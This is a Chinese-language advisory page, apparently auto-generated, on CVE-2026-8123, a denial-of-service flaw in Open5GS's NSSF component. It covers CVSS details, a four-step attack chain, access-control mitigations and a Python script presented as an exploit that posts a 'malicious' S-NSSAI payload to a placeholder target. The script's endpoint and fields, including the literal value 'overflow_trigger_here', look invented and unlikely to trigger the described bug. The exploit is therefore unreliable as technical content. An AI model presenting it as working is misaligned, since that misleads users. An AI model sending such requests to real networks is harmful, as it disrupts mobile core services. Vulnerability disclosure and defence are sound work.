CVE-2026-8123 Open5GS NSSF组件拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8123

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

CVE-2026-8123是Open5GS 2.7.7及以下版本中NSSF组件的一个安全漏洞。该漏洞源于`/lib/sbi/message.c`文件中的`ogs_sbi_discovery_option_add_snssais`函数存在缺陷。攻击者可利用此漏洞发送特制数据包，导致目标系统资源耗尽或崩溃，从而引发拒绝服务。由于该漏洞可被远程利用且无需用户交互，对5G核心网的稳定性构成威胁。

技术细节

该漏洞位于Open5GS的NSSF（网络切片选择功能）组件，具体受影响的函数为`ogs_sbi_discovery_option_add_snssais`。该函数主要负责处理SBI接口消息中的S-NSSAI（单网络切片选择辅助信息）选项。由于代码在处理特定字段时缺乏足够的边界检查或异常处理机制，攻击者可以通过构造恶意的SBI请求报文进行远程攻击。当系统解析这些畸形的S-NSSAI数据时，可能触发内存访问错误或无限循环，导致服务进程终止。CVSS 3.1评分为4.3，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需用户交互（UI:N），仅需低权限（PR:L）即可触发。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Open5GS NSSF组件接口及端口。

STEP 2

制作载荷

利用`ogs_sbi_discovery_option_add_snssais`函数的缺陷，构造包含畸形S-NSSAI数据的恶意SBI请求报文。

STEP 3

发起攻击

通过网络远程向目标NSSF服务发送特制的恶意数据包。

STEP 4

达成效果

目标服务在解析数据时发生异常，导致进程崩溃或资源耗尽，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration (Replace with actual target details)
target_url = "http://TARGET_IP:PORT/nssf-nssf-discovery"

# Crafted payload to trigger the vulnerability in ogs_sbi_discovery_option_add_snssais
# The payload structure mimics a malformed S-NSSAI request.
malicious_payload = {
    "nfInstanceId": "trigger",
    "nfType": "NSSF",
    "discoveryRequest": {
        "snssais": [
            {
                "sst": 1,
                "sd": "overflow_trigger_here"
            }
        ]
    }
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

try:
    print(f"Sending exploit payload to {target_url}...")
    response = requests.post(target_url, json=malicious_payload, headers=headers, timeout=10)
    print(f"Response Status: {response.status_code}")
    print("If the service is unresponsive, the DoS was successful.")
except requests.exceptions.RequestException as e:
    print(f"Request failed or service crashed: {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于官方尚未发布补丁，建议采取访问控制措施，仅允许授权的IP地址访问Open5GS的NSSF接口。同时，建议部署入侵检测系统（IDS）监控异常的SBI流量模式，并配置服务监控脚本，在检测到服务崩溃时自动重启以维持业务连续性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8123
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8123
3 Details https://www.cvedetails.com/cve/CVE-2026-8123/
4 VulDB https://vuldb.com/cve/CVE-2026-8123
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4436
7 Link https://vuldb.com/submit/808426
8 Link https://vuldb.com/vuln/361910
9 Link https://vuldb.com/vuln/361910/cti